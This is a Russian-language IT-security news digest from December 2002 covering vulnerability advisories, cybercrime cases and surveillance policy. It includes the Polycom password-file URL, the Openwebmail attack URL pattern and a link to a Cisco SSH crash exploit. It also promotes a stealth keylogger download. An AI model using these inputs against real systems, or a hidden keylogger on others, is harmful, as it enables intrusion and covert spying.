На сайте ezine.daemonnews.org открыт сервис под названием "The Answer Man". На вопросы пользователей, связанные с различными тонкостями работы FreeBSD отвечают Gary Kline, David Leonard и Dirk Myers. На странице также архив вопросов за 2002 г., а также статья по настройке FreeBSD, состоящая из 2-х частей. Ссылка - http://ezine.daemonnews.org/200212/answerman.html
24/12/2002 11:36 В Приамурье два студента-хакера приговорены к крупным штрафам.
В Амурской области прошло первое судебное разбирательство по делу о взломе компьютерных сетей, сообщает "Интерфакс". Два студента четвертого курса факультета математики и информатики Амурского государственного университета были приговорены судом города Благовещенска к крупным денежным штрафам за вскрытие паролей доступа к компьютерным сетям. Как было установлено в ходе следствия, нарушители получили доступ в компьютерные сети областной администрации, СМИ, некоторых коммерческих структур. Полученную оттуда закрытую информацию студенты намеревались продавать заинтересованным лицам. Вынося приговор суд учел признательные показания обвиняемых, их возраст, а также то, что они не успели воспользоваться незаконно полученными данными. Подробности - http://www.interfax.ru/...
24/12/2002 11:18 Руководство по безопасности в Solaris.
На сайте Sun Microsystems опубликовано руководство по безопасности ОС Solaris. Авторы - Alex Noordergraaf и Keith Watson. Описывает изменения, которые необходимо сделать после установки ОС Solaris "из коробки". В документе также описаны методы, которые применяют взломщики для взлома системы, а также шаги, которые необходимо выполнить для обеспечения безопасного функционирования сервера (или рабочей станции) под управлением ОС Solaris. Адаптировано под версию Solaris 9 и представляет собой документ в PDF-формате объёмом 60 страниц. Подробности - http://www.sun.com/solutions/blueprints/1202/816-5242.html
24/12/2002 10:41 Внутреннее расследование Microsoft.
В конце прошлой недели отделение ФБР американского города Сиэттл заявило, что дополнительных арестов по делу Фьюснера не ожидается. Две недели назад сотруднику Microsoft г-ну Фьюснеру (Feussner) было предъявлено обвинение в перепродаже программного обеспечения из системы внутренних продаж на сумму $9 млн. Однако Microsoft не считает, что этот случай единичный, и говорит о продолжении расследования, связанного с внутренней системой покупки ПО сотрудниками, заявляет журналист The Seattle Post Дэн Ричман (Dan Richman). Ричман пишет, что Фьюснер действовал аккуратно - он никогда не заказывал ПО сразу на сумму более $1000, при которой на продажу требуется разрешение администратора внутреннего сайта-магазина наподобие "One Click Shopping" от Amazon. Источник - http://www.cnews.ru
24/12/2002 10:06 Уязвимость в утилите pdftops.
Утилита pdftops предназначена для конвертации файлов формата PDF (Portable Document Format - переносимый формат документов) в формат PostScript. Фильтр pdftops используется пакетами CUPS (Common Unix Printing System - система печати UNIX) и Xpdf - программа для просмотра PDF-файлов. Оба пакета входят в состав многих дистрибутивов открытых UNIX-систем. Компанией iDEFENSE была обнаружена уязвимость в pdftops. В результате переполнения буфера при обработке специально сформированного документа возникает возможность получения привилегий на удалённой системе и, в некоторых случаях, повышение привилегий до пользователя 'lp', если установлены полномочия SUID. Cама компания утверждает, что уязвимость является локальной. Для выполнения удалённой атаки необходимо каким-либо образом заставить жертву распечатать специально сформированный PDF-документ из командной строки. Уязвимость была обнаружена в текущей версии Xpdf 2.01, а также в Red Hat Linux 7.0 с CUPS-1.1.14-5 (RPM). Выпущен патч для Xpdf, доступный с сайта производителя. Новая версия CUPS (1.1.18) также не содержит уязвимости. Подробности - http://www.idefense.com/advisory/12.23.02.txt
23/12/2002 20:55 Cканер безопасности MBSA v1.1.
MBSA расшифровывается, как Microsoft Baseline Security Analyzer, версия 1.1 которого была выпущена в начале месяца. MBSA - первый продукт, выпущенный недавно сформированным подразделением Microsoft Security Business Unit (SBU), являющегося ключевым в рамках провозглашённой Microsoft Инициативы Компьютерной Надёжности (безопасности) - Trustworthy Computing Initiative. Версия 1.0 была выпущена в ответ на появление червей Code Red и Nimda, и представляла собой многопоточный сканер безопасности, который анализировал отдельный компьютер, либо группу компьютеров на отсутствие необходимых патчей и других нарушений безопасности. В версии 1.1 были устранены баги предыдущей версии, а также включен хотфикс сканер HFNetChk. Подробное описание - http://online.securityfocus.com/infocus/1649
23/12/2002 20:32 Выход Postfix 2.0.
Официально вышла 2 версия самого быстрого и безопасного почтового агента - Postfix. Основные новшества: поддержка MIME (включая преобразования 8бит ->7бит и более аккуратное сопоставление заголовков MIME в теле сообщений), полностью переписанный RBL клиент, более умное управление ошибками при DNS просмотре в UCE ограничениях, виртуальный доставщик без transport map для каждого домена, и еще длинный список других вещей, предназначенные для повышения производительности или функциональности не задевая побочно то, что уже есть. Официальный релиз - ftp://ftp.porcupine.org/mirrors/postfix-release/official/
23/12/2002 20:11 Администрация Буша собирается следить за пользователями Интернета.
Администрация Джорджа Буша намерена рекомендовать крупнейшим интернет-провайдерам страны создать централизованную систему мониторинга, позволяющую проводить широкомасштабное сканирование сети Интернет и, возможно, слежку за ее пользователями. Данное предложение, по данным газеты The NewYork Times, содержится в окончательной редакции доклада "Национальная стратегия обеспечения безопасности в киберпространстве", который подготовлен советниками президента по вопросам защиты государственных инфраструктур. В докладе, опубликование которого намечено на начало следующего года, предлагается создать особую систему взаимодействия государственных и частных организаций для организации совместной защиты компьютерных сетей США не только от вирусов, но и потенциальных атак террористов. Подробности - http://www.nytimes.com/...
23/12/2002 19:57 Интервью Дмитрия Склярова.
В перерыве между судебными слушаниями Лайза Боумен из ZDNET взяла интервью у Дмитрия Склярова, недавно оправданного американским судом. Российский программист Дмитрий Скляров считает, что прокуроры поступили несправедливо, продемонстрировав видеозапись его показаний на процессе ElcomSoft, — вместо того чтобы вызвать его лично. Однако после завершения судебной саги, в которой были и внезапный арест в Лас-Вегасе, и три недели, проведенные в тюрьме, и проблемы с визой, чуть было не помешавшие ему возвратиться на процесс в Соединенные Штаты, Скляров решил не волноваться о ситуации, повлиять на которую он больше не в состоянии. «В своей жизни я стараюсь не уделять слишком много времени попыткам разобраться в вещах, которые я не могу изменить», — сказал 27-летний Скляров в своем первом интервью после выступления на уголовном процессе о нарушении авторских прав его работодателем ElcomSoft. Тщательно подбирая слова, как человек, говорящий на иностранном языке и к тому же связанный соглашением о сотрудничестве с правительством США, Скляров поведал о своей жизни после ареста, о своих впечатлениях о процессе и значении спорного закона Digital Millennium Copyright Act (DMCA) для программистов. Подробности - http://www.zdnet.ru/?ID=293650
23/12/2002 16:47 Статья "Распознавание и отслеживание новых опасных червей при помощи разветвленной системы обнаружения вторжения".
На сайте www.securitylab.ru выложен перевод статьи Натана Айнвехтера, называемой в переводе "Распознавание и отслеживание новых опасных червей при помощи разветвленной системы обнаружения вторжения". Посвящена технологии dIDS - разветвленной системt обнаружения вторжения предназначенной для обнаружения новых червей, которые используют новую опасную технику бесконтрольного размножения. В этой статье обсуждается, как и почему dIDS система способна распознавать и отслеживать червей, даже если они используют новые перспективные методы бесконтрольного размножения. Статья - http://www.SecurityLab.ru/?ID=35053
23/12/2002 16:29 Подсудимый вирусописатель призывает обманывать мир.
21-летний житель Уэльса признал себя виновным в заражении 27 тыс. ПК тремя разными вирусами, рассылаемыми по электронной почте. Саймон Валлор (Simon Vallor) из уэльского города Лландадно (Llandudno) был обвинен в нарушении британского закона о противоправном использовании компьютерных технологий (Computer Misuse Act) от 1990 года путем написания и распространения вирусов. Из-под пера вирусописателя из Уэльса вышли вредоносные коды Admirer, Gokar и Redesi. Ни одному из них не удалось разделить дурной славы самых распространенных вирусов 2002 года, однако, как заявило обвинение, интернет-червь Gokar в начале этого года заразил 27 тыс. компьютеров по всему миру. Как и других вирусописателей, Валлора на его сомнительные подвиги подвигло желание прославиться на весь мир, реализованное в довольно своеобразной форме. Перед пятничным слушаньем он несколько мелодраматично написал на своем веб-сайте: "Я бы, конечно, хотел быть осужден условно, но, думаю, я прошу слишком о многом. Если же меня все-таки осудят, помните: Mundis vult decipi, ergo decipaitur (Мир хочет быть обманутым, так будем же обманывать его (лат.)". Как бы там ни было, продолжает свою публичную исповедь вирусописатель, "я не могу сказать, что все в этом мире было хорошо - ну так, немного смешного, несколько шуток, немного выпитого и выкуренного... Мне есть о чем сожалеть, однако я не стыжусь быть самим собой". Подробности - http://www.cnews.ru/
23/12/2002 15:56 Сисадмин обвиняется в нанесении ущерба своей компании на сумму в 3 млн. долларов.
Роджеру Дуронио, бывшему системному администратору корпорации UBS PaineWebber, предъявлено обвинение в нанесении ущерба путем закладки "логической бомбы" в компьютерную сеть компании. По сообщению федерального прокурора, Дуронио надеялся спровоцировать падение курса акций UBS, парализовав работу более 1000 компьютеров компании. По данным обвинения, "логическая бомба", представляющая собой программу, уничтожающую компьютерные файлы, сработала 4 марта этого года. Бывшему системному администратору грозит тюремное заключение сроком до 20 лет и штраф размером свыше 1,25 млн. долл. США. Нанесенный "логической бомбой" ущерб компании UBS PaineWebber оценивется в 3 млн. долл. Сотрудники, отвечающие за информационную безопасность компании, утверждают, что защита систем компании от собственных сотрудников представляется очень сложной задачей. "Если кто-либо из сотрудников компании решится на враждебные действия, предотвратить их очень сложно, поскольку практически невозможно бороться с угрозами, исходящими от проверенных, казалось бы, людей", - сообщил один из представителей руководства компании. По данным исследования, проведенного Институтом компьютерной безопасности при ФБР США, 74% компьютерных преступлений совершаются "извне", посредством интернета, в то время как 33% из них совершаются "изнутри", сотрудниками компании, знающими все слабости корпоративных систем и поэтому способными причинить особенный вред. Источник - http://www.techweb.com
23/12/2002 15:25 Microsoft отрицает слухи о разработке шпионского ПО для Израиля.
Корпорация Microsoft опровергла появившиеся в арабской прессе сообщения о том, что она создала шпионское программное обеспечение для Израиля. Согласно материалу, размещенному на одном из арабоязычных интернет-ресурсов, софтверный гигант создал программу, с помощью которых израильская разведка следит за подобными сайтами. По словам Фахда Аль-Судайри, менеджера по маркетингу Microsoft Arabia, подобные сведения сфабрикованы и не имеют под собой никакой реальной основы. Аль-Судайри сообщил также, что Microsoft не ведет разработок специального программного обеспечения для военных нужд. С другой стороны, ничто не мешает израильской разведке или военным применять для решения своих задач общедоступные коммерческие продукты корпорации. Никаких ограничений на этот счет не существует. Источник - http://www.compulenta.ru
22/12/2002 21:42 На нашем сайте новая программа: UINC KeyLogger v1.0
UINC KeyLogger предназначен для перехвата и сохранения в файл всего, что вводится с клавиатуры. Программа умеет работать в скрытом режиме и всплывать по нажатию комбинации клавиш. UINC KeyLogger умеет отсеивать ненужные данные и перерабатывать лог в максимально удобный для чтения вид. При постоянном использовании программы вы будете обезопасены от случайных потерь набранного ранее текста, как это часто бывает при работе в сети Интрернет. В любой момент времени вы сможете восстановить текст, который был набран вчера, позавчера, или неделю назад. UINC KeyLogger также поможет вспомнить подзабытый пароль или потерянный e-mail. Избавьте себя от случайностей! Отличие этого клавиатурного шпиона от других подобных программ в том, что он самый маленький и занимает меньше всего памяти. Скачать KeyLogger можно здесь: http://www.uinc.ru/scripts/load.cgi?files/kmint21/keylogger.zip
22/12/2002 16:37 Red Hat прекращает поддержку Alpha и Sparc.
Red Hat, Inc. больше не будет поддерживать Red Hat Linux для архитектур Sparc и Alpha. Кроме того, исправления (errata) для каждого дистрибутива, начиная с версии 8.0, будут выходить в течение не менее чем 12 месяцев с момента его официального выпуска. Отказ от поддержки старых версий позволит разработчикам сконцентрироваться на более новых и перспективных продуктах. Отметим, что все вышесказанное не относится к Red Hat Linux Advanced Server. Источник - http://www.linuxcenter.ru
22/12/2002 15:22 В Туле задержан 17-летний хакер, который взломал компьютерную базу МВД.
Сотрудники подразделения милиции Тулы, которое занимается преступлениями в сфере высоких технологий, уличили в преступной деятельности в сети интернет 17-летнего Сергея Сироткина. С помощью специальной программы хакер смог достать пароли доступа к электронным ящикам МВД. Программу Сироткин скачал из интернета, а потом там же разместил предложение о продаже секретной информации. "Трояны, или троянские кони - это вредоносные программы, с помощью которых хакер может извлечь из компьютера любую интересующую его информацию", - сказал Телекомпании "Плюс 12" начальник коммерческой службы компании "UNS" Александр Шевченко. Сотрудники правоохранительных органов задержали несовершеннолетнего хакера с поличным. В компьютере Сироткина была обнаружена компьютерная база МВД. Прокуратура Центрального района Тулы возбудила уголовное дело. За создание, использование и распространение вредоносных программ ему грозит три года лишения свободы. Сам Сироткин признался, что он взломал базу МВД, он сказал, что "не нанес никому вреда - а просто пошутил". Источник - http://www.bgrad.ru/detail/?subj=Detail&Key=&news_id=2862
22/12/2002 14:49 Очень серьёзная уязвимость в KDE!
В популярной в мире открытых систем среде KDE обнаружена очень серьёзная уязвимость. Об этом сообщил от имени команды разработчиков KDE Дирк Муэллер. Детали уязвимости пока не раскрываются, однако сообщается, что связана она с некорректной обработкой параметров инструкций, передававемых приложениями KDE для выполнения командной оболочке (шеллу). Подобные параметры могут быть переданы с URL, электронными адресами, именами файлов и могут быть переданы жертве при посылке E-mail, посещении Вэб-страниц, доступе к файлам по сети (NFS). Cформировав подобные данные, атакующий (как локальный, так и удалённый) может выполнить произвольные команды на уязвимой системе с привилегиями жертвы атаки. И хотя на настоящий момент не известно о существовании эксплоита этой уязвимость, разработчики KDE выпустили обновлённую версию KDE, а также необходимые патчи. Уязвимыми оказались все версии KDE - как ветви 2, так и ветви 3 (включая крайнюю версию 3.0.5). В итоге была выпущена версия 3.0.5а, а также патчи для пакетов версии 2.2.2. В официальном анонсе также сообщается, что об уязвимости сообщил 26 ноября некий FozZy из "Hackademy Audit Project". Подробности и ссылки - http://www.kde.org/info/security/advisory-20021220-1.txt
22/12/2002 13:34 Руководство по реализации системы обнаружения атак (IDS) на базе Snort.
На сайте opennet.ru выложена ссылка на руководство по настройке и установке Snort. В статье рассказано как установить связку Snort и Acid (анализ логов snort, запись информации в mysql и визуальное представление через web-интерфейс). Так же описан процесс установки и настройки программ: Apache, OpenSSL, Mod_SSL, MySQL, PHP, Adodb, PHPLot, Libpcap, GD. Ссылка - http://www.alphademon.com/unix/snortbsd.txt
22/12/2002 12:48 Интернет-червь Klez признан вирусом года.
Интернет-червь Klez признан специалистами в области компьютерной безопасности вирусом года, сообщает сайт Vnunet.com. Как утверждает британский производитель антивирусного программного обеспечения компания Sophos, в 2002 году почти четверть обращений ее клиентов связана именно с вирусом Klez. "В отличие от прежних лидеров рейтинга, подобных вирусу LoveBug, Klez не исчез вскоре после своего появления и по-прежнему является самым распространенным медленнодействующим червем. Klez постоянно заражает компьютеры пользователей, хотя защита от этого вируса появилась практически одновременно с ним. Единственным возможным объяснением продолжающегося "успеха" Klez является то, что некоторые пользователи пренебрегают обновлением антивирусных баз", - рассказал один из консультантов Sophos. На втором месте в рейтинге наиболее распространенных вредоносных программ оказался вирус Bugbear, впервые обнаруженный лишь в октябре. Именно его представители еще одной антивирусной компании, Messagelabs, называют драматическим открытием года. В пиковый момент активности вируса Bugbear пользователи обнаруживали его в каждом 87-м письме, в то время как Klez в момент своего "расцвета" оказывался в каждом 169-м письме. Представители Sophos и Messagelabs также отметили значительное увеличение количества троянских вредоносных программ. Источник - http://www.lenta.ru
22/12/2002 12:25 Уязвимость в реализации SSH CISCO.
Cisco Systems, Inc. сообщает о наличии уязвимости в некоторых продуктах этой фирмы, в которых сконфигурирован SSH-сервер для организации доступа. Уязвимость обнаружена в следующих версиях IOS: 12.0S, 12.0ST, 12.1T, 12.1E, 12.2, 12.2T, 12.2S. При этом фирма сообщает, что по умолчанию SSH-сервер не активизирован (команда IOS: "crypto key generate rsa" в конфигурационном режиме). Уязвимость заключается в следующем: при посылке специально сформированного SSH-пакета маршрутизатор немедленно перезагружается (за исключением CISCO 3550, который необходимо вручную перезапустить для возобновления функциональности). Подобная атака может быть выполнена при помощи инструмента SSHredder, выпущеннного Rapid7, Inc. (мы давали на него ссылку в более ранних выпусках новостей. Уязвимости присвоен код DDTS CSCdz60229. Для устранения бага необходимо обновить ПО. В качестве временой меры предлагается отключить SSH-сервис командой IOS: "crypto key zeroize rsa" в конфигурационном режиме. Подробности - http://www.cisco.com/warp/public/707/ssh-packet-suite-vuln.shtml Эксплоит - http://packetstorm.linuxsecurity.com/0212-exploits/sshredder.zip
22/12/2002 11:48 Возможность обхода аутентификации в Polycom ViewStation.
ПО Polycom ViewStation FX предназначено для организации видеоконференций. Тамер Сахин из SecurityOffice сообщает о возможности обхода аутентификации в этом ПО (применяется при изменении конфигурации системы через Вэб-интерфейс). Пароли, необходимые для аутентификации хранятся в открытом виде в файле a_security.htm. Таким образом, набрав URL вида http://<host>/a_security.htm, можно получить содержимое паролей. Уязвимость была обнаружена в Polycom ViewStation FX Release v4.2. Источник - http://www.securityoffice.net/articles/
21/12/2002 18:47 "Теневой проект" США.
В дополнение к предыдущей информации хотелось бы упомянуть также о проекте Министерства Обороны США под красноречивым названием "TIA" - Total Information Awareness, что переводится, как глобальная информационная осведомлённость. Задача TIA заключается в создании некоей единой базы данных о гражданах страны, которая бы сводила воедино сведения, собранные из различных источников: компании, занимающиеся выдачей кредитных карточек, медицинских страховых компаний, пункты покупки и продажи автомобилей, а также их регистрации. Анализ всех собранных данных может позволить заранее определить потенциальных террористов. Информационное агенство News.com сообщает, что в крайнее время информация об руководителях и участниках этого проекта начинает постепенно "исчезать". Так, недавно все данные о руководителе проекта отставном адмирале Джоне Пойндекстере (кстати, он был замешан в скандале под названием "Ирангейт") исчезли с сайта Министерства Обороны. То же самое произошло и с информацией об остальных руководителей TIA. Затем исчезла информация и о самом проекте TIA. Как пишет дальше NEWS.COM, сама эмблема TIA - масонская пирамида с всевидящим оком сверху (Вы можете увидеть подобный рисунок на долларовой купюре США) - является довольно нетипичной эмблемой для государственных учреждений США. Девизом этого проекта является латинская фраза "scientia est potentia", что переводится как "знание-сила". Подробности - http://news.com.com/2100-1023-978598.html?tag=fd_top
21/12/2002 18:06 Белый Дом организовывает систему глобального надзора над Интернет.
Американское правительство в пятницу заявило, что действия по усилению интернет- безопасности не станут вмешательством в частную жизнь пользователей глобальной сети, сообщает Reuters. По словам представителя Белого дома, "Администрация США не рассматривает вариант контролирования того, чем граждане занимаются в интернете". Подобная позиция властей отвечает намерениям работающих в сфере коммуникаций компаний, руководство которых неоднократно заявляло о том, что будет сопротивляться попыткам властей вмешиваться в функционирование глобальной компьютерной сети. Ранее, в списке намеченных принципов реформирования сетевой безопасности, обнародованных в сентябре, Белый дом заявлял, что связанные с интернетом компании должны координировать свою деятельность с правительством США для лучшей защиты от компьютерных вирусов и других видов кибератак. В пятничном выпуске газеты New York Times опубликована информация о том, что администрация Джорджа Буша намерена усилить роль властей в структуре интернет-безопасности. Данный шаг, по мнению обозревателей, способен привести к установлению надзора за деятельностью не только сети в целом, но, в частности, и каждого отдельного пользователя. Тем не менее, источники в хай-тек компаниях, комментируя данную информацию, заявили, что не опасаются реализации этих планов. Ричард Кларк (Richard Clarke), отвечающий в Белом доме за кибербезопасность, также считает, что фирмам и пользователям бояться нечего. По его словам, правительство хочет от компаний только лишь создания "системы раннего предупреждения", следящей за здоровьем глобальной сети. В случае создания подобной структуры, считает Кларк, собираться будет лишь очень сжатая информация о состоянии интернета в целом. Работающие в сфере интернета американские компании, вроде AT&T Corp. и VeriSign Inc. уже создали свои собственные центры мониторинга сети. В их задачи входит отслеживание нетипичных пакетов в трафике, которое может сигнализировать о попытке DDoS-атаки (Distributed Denial Of Service Attack) - очень распространенному методу "нападения", жертвами которого в свое время стали веб-сайты Yahoo!, eBay, Buy.com, Amazon.com, CNN.com и даже ресурс Белого дома. По мнению экспертов индустрии, подобные службы неспособны читать e-mail-сообщения или каким-либо образом осуществлять мониторинг контента сайтов. Также эти системы не могут быт использованы для выявления членов террористических сетей и группировок. По словам представителей компаний, участие властей в их работе будет лишним, так как они сами находятся в постоянном контакте друг с другом и не нуждаются в координации своих усилий. Как заявил Харрис Миллер (Harris Miller), глава Ассоциации информационных технологий Америки (Information Technology Association of America): "Мониторингом системы занимается такое большое количество людей, что мимо них ничего не проскользнет". По сообщениям источников в индустрии, компании, предоставляющие провайдерские услуги, пойдут на взаимодействие в правительством и предлагаемый им мониторинг трафика только по решению суда, так как подобная практика в конечном счете приведет к оттоку их клиентов. Публикация модернизированной версии плана осуществления интернет-безопасности, учитывающей интересы как провайдеров, так и властей, ожидается в начале следующей недели. Источник - http://www.lenta.ru/
21/12/2002 17:13 Microsoft выпустила DirectX 9.
Как и ожидалось, девятнадцатого декабря 2002 года компания Microsoft выпустила окончательную версию программного интерфейса (API) DirectX 9. Этот программный интерфейс уже можно скачать с официального сайта Microsoft, а также с сайта Betanews. По указанным адресам находится веб-инсталлятор, при использовании которого потребуется надежное подключение к интернету: сам DirectX 9 "весит" около восьми мегабайт и его загрузка начнется при запуске этого инсталлятора. При установке DirectX 9 на Windows 2000 или XP необходимо обладать правами администратора. Обозреватели интернет-издания Inquirer предупреждают, что для деинсталляции DirectX 9 придется переустановить Windows, поскольку никаких средств для удаления этого программного интерфейса программисты Microsoft не предусмотрели. Кроме того, установка DirectX 9 имеет смысл только для счастливых обладателей видеокарт на основе ATI Radeon 9500, 9500 Pro, 9700 и 9700 Pro, поскольку никакие другие видеокарты пока не поддерживают нововведений этого программного интерфейса. Скачать - http://download.microsoft.com/download/...
21/12/2002 16:47 Голливуд подал в суд на производителя ПО для копирования DVD.
Семь ведущих голливудских киностудий подали в суд на разработчика программного обеспечения для копирования DVD-дисков, которое, как утверждается, может использоваться в пиратских целях. Компания 321 Studios производит программы DVD Copy Plus и DVD X Copy, которые в настоящее время свободно продаются в США. Эти программы позволяют, преодолевая защиту, делать копии DVD-фильмов на записываемых СD- или DVD-дисках. Киностудии считают, что им наносится существенный материальный ущерб. С их точки зрения, применение таких программ является нарушением авторских прав. Они потребовали от суда запретить их продажу и распространение, а также рассмотреть возможность выплаты компенсаций. "Распространение программ, подобных DVD Copy Plus и DVD X Copy можно сравнить с продажей цифровой отмычки, которую можно использовать исключительно в целях воровства", - заявила Патриция Бенсон, представляющая в суде интересы киностудий. Источник - http://www.ap.com/
21/12/2002 16:24 Очередной удар по спамерам.
Как сообщает информационное агентство BBC, американская компания America Online (AOL) - один из ведущих интернет- провайдеров - в очередной раз выиграла суд над спамерами. America Online вела дела против компании CN Productions и ее владельца Джея Нельсона, обвиняя их в нанесении ущерба путем рассылки почти миллиарда несанкционированных писем с призывом к посещению порносайтов. Это уже примерно двадцатая победа AOL над спамерами и вторая над CN Productions. Первый иск AOL против CN Productions был удовлетворен еще в 1999 году. Суд штата Вирджиния суд признал спамеров виновными и предписал их выплатить штраф в размере 7 миллионов долларов. Удовлетворение иска AOL стало первым случаем применения изменений в законодательстве, принятых в Вирджинии. "Это важная юридическая победа в рамках борьбы со спамом. Спамеры получили четкий и внятный сигнал о том, что AOL готова использовать все юридические и технологические инструменты против желающих наполнить ящики пользователей ненужной рекламой", - прокомментировал решение суда генеральный консультант AOL Рэндалл Бо. Источник - http://www.lenta.ru
21/12/2002 15:52 ASPLinux и SecurIT представили решение по безопасности бизнеса.
Компании ASPLinux и SecurIT подписали соглашение о совместной деятельности. Специалистами ASPLinux было проведено тестирование системы защиты, разработанной компанией SecurIT, в результате которого компания ASPLinux сертифицировала систему защиты серверов SecurIT на совместимость с дистрибутивом ASPLinux 7.3 "Восток". Система защиты корпоративных серверов компании SecurIT предназначена для защиты информации, хранящейся на корпоративных серверах путем "прозрачного" шифрования разделов жесткого диска. При записи данных на защищенный диск они автоматически зашифровываются, при чтении - расшифровываются. Ключ шифрования хранится на смарткарте, защищенной PIN-кодом и вводится только при открытии диска. Таким образом, злоумышленник, не имеющий ключа шифрования, не может получить доступ к зашифрованным данным даже в случае изъятия компьютера или жесткого диска с данными. Источник - http://www.asplinux.ru/
20/12/2002 17:05 Статья "Способы применения “Covert Channels”.
На сайте void.ru опубликована статья под названием "Способы применения “Covert Channels”. Covert Channels - это, фактически, нетрадиционные виды передачи дискретной информации, которые могут угрожать политике безопасности системы. В большинстве случаев для этого используются заголовки многих сетевых протоколов (в большинстве случаев это IP,TCP и ICMP). Сама статья рассматривает как методы размещения/передачи информации, так и утилиты, реализующие описанную технологию. Статья - http://void.ru/content/1035
20/12/2002 16:31 Декабрьская статистика Netcraft.
Опубликована очередная еженедельная декабрьская статистика Netcraft Web Server Survey, представляющая собой цифровую статистику по используемому ПО Вэб-серверов, а также их операционных систем. Итак, что мы имеем в результате? Было обследовано 35,543,105 сайтов, что меньше, чем в прошлом месяце, но больше, чем в октябре. "Четвёрка лидеров" выглядит такой же: Apache, Microsoft, Zeus, и iPlanet. В цифровом эквиваленте это выглядит соотвественно (в процентах): 62.02, 27.58, 2.12, 1.35. При этом доля "индейца" увеличилась на 1.22%, а Microsoft уменьшилась на 1.11%. При всём при этом доля Вэб-серверов из домена .com составила 45.74% от общего числа ответивших (проверенных) серверов. Подробнее - http://www.netcraft.com/Survey/Reports/0212/byserver/index.html
20/12/2002 15:41 Инструмент от IBM - IP Security Validator.
Разработчик из IBM представил новый экспериментальный инструмент под названием IP Security Validator, предназначенный для согласование (подтверждения) конфигураций VPN (виртуальные сети) между различными сетевыми интрфейсами. При тестировании была продемонстрирована работоспособность двух сетей, взаимодествующих посредством IP Security Validator. Как утверждает автор инструмент достаточно прост в настройке и обслуживании и может быть использован как конечными пользователями, так и администраторами при организации криптозащищённых туннелей (например, для организации IPSEC VPN. Более подробно - http://www.alphaworks.ibm.com/tech/ipsecvalidate?open&t=gr,lnxw41=IPsecurity
20/12/2002 15:16 В будущем году Web-технологии станут более защищёнными.
В среду группа компаний под управлением IBM и Microsoft опубликовала ряд спецификаций, основное назначение которых - значительное усиление защищённости Вэб-приложений и технологий. Предлагаемые технологии описывают, каким образом должны взаимодествовать компании через Интернет для обмена информацией и как согласовать между собой зачастую несовместимые системы безопасности. IBM и Microsoft в этом благом начинании поддержали также такие известные компании, как BEA Systems, RSA Security и VeriSign. Как следует из соместного заявления компаний, спецификации преполагается оформить в виде стандартов в начале следующего года. Подробности - http://news.com.com/2100-1001-978314.html?tag=fd_top
20/12/2002 14:36 В США создан Компьютерный Криминальный Центр.
Директор ФБР Роберт Муэллер присутствовал на открытии Компьютерного Криминального Центра (S.C. Computer Crime Center) в офисе Агентства в г. Сейнт-Эндрюс (St. Andrews), штат Южная Каролина. "Центр был создан с целью организации более тесного взаимодействия между федеральными и государственными подразделениями полиции" - сказал директор на открытии этого Центра. Стоимость Центра оценивается в 6.5 млн. долларов. На эти деньги он был оснащён современнейшим на данный момент оборудованием, призваным обеспечить как защиту национальной инфраструктуры, так и для нанесения ударов по террористам (или причисляемым к им политиками США). Подробности - http://www.thestate.com/mld/thestate/news/local/4763628.htm
20/12/2002 13:21 Наличие уязвимости в CISCO IOS.
Phenoelit сообщает об уязвимости в ОС производства CISCO - IOS. Была обнаружена в реализации протокола EIGRP (расширенный протокол маршрутизации) в версиях: 11.3, 12.0(19), 12.2. При зафлуживании роутеров CISCO EIGRP-сообщениями от имени ложных соседних маршрутизаторов, роутер, оказавшийся под атакой порождает шторм ARP-сообщений, в которых пытается обнаружить MAC-адрес маршрутизатора, пославшего EIGRP-сообщение, при этом весь канал оказывается забит штромом сообщений и маршрутизатор не в состоянии выполнять возложенную на него работу (маршрутизация). В качестве меры противодействия рекомендуется применять EIGRP - аутентификацию с использованием MD5-хэшей. Кроме этого, сама фирма CISCO рекомендует использовать списки контроля доступа (ACL) для указания роутеру списка серверов, от которых разрешён приём EIGRP-пакетов. Уязвимости присвоен код Cisco Bug ID CSCdv19648. Подробности - http://www.phenoelit.de/stuff/CiscoEIGRP.txt Описание от CISCO - http://www.cisco.com/cgi-bin/Support/Bugtool/launch_bugtool.pl
20/12/2002 12:54 Множественные уязвимости в CUPS.
Компания iDEFENSE, занимающаяся исследованием компьютерной безопасности описала подробности уязвимостей, обнаруженных ранее (11/14/2002) в CUPS - Common Unix Printing System (система организации печати). CUPS используется по умолчанию в ОС следущих производителей: Apple Computer Inc., Debian, FreeBSD, MandrakeSoft Inc., NetBSD Foundation, Red Hat Inc., Slackware Linux Inc., SuSE Inc., The SCO Group, Turbolinux Inc. Непосредственное тестирование производилось в Red Hat Linux 7.0/7.3 с версиями CUPS-1.1.14-5(17) -1.1.17, собранными как из RPM-пакетов, так и исходников. Было обнаружено целых 7 уязвимостей, каждой из которых был присвоен соответствующий код в базе CVE, поддерживаемой Mitre Corp. Вкратце на английском языке перечень уязвимостей: Multiple Integer Overflows, /etc/cups/certs/ Race Condition, Adding Printers with UDP Packets/Root Certificate Design Flaw, Negative Length Memcpy() Calls, Unsafe Strncat Function Call in jobs.c, Zero Width Images in filters/image-gif.c, File Descriptor Resource Leaks. В результате использования этих уязвимостей как локальный, так и удалённый взломщик может получить права суперпользователя системы. Производитель ПО CUPS Michael Sweet из Easy Software Products объявил, что 19.12 была выпущена версия 1.1.18, в которой указанные уязвимости не присутствуют. Также авторами был получен ответ от Red Hat и Apple. Подробное описание - http://www.idefense.com/advisory/12.19.02.txt
20/12/2002 11:48 Уязвимость в Openwebmail.
Дмитрий Гайворонский (Dmitry Guyvoronsky) сообщает об обнаружении очень серьёзной уязвимости в пакете Openwebmail. Используя её можно как локально, так и удалённо (!) выполнить произвольный код от имени суперпользователя (!!) сервера. Openwebmail - это приложение, позволяющее через Вэб-интерфейс посылать почтовые сообщения - сайт разработчика http://openwebmail.org. Наличие уязвимости связано с ошибками в Перл-скрипте, на котором написано приложение, а также тем фактом, что многие Перл CGI-скрипты запускаются от имени суперпользователя с установленным битом SUID. В частности, в скрипте openwebmail-shared.pl некорректно производится проверка переменной $loginname. Для проведения атаки необходимо сначала положить на сервер файл конфигурации (либо через анонимную загрузку, либо через заведённый эккаунт) и потом сформировать ссылку вида: http://site.url/cgi-bin/openwebmail-abook.pl?sessionid=@[PATH]-session-0 , где переменная PATH - путь к файлу. Уязвимость была обнаружена в текущей версии Openwebmail (1.71). Необходимо отметить, что производитель выпустил соответствующие патчи и обновил текущую версию продукта. Подробности - http://sourceforge.net/forum/forum.php?thread_id=782605&forum_id=108435
20/12/2002 10:38 Развитие WLAN-сетей понизит обороноспособность, считают американские военные.
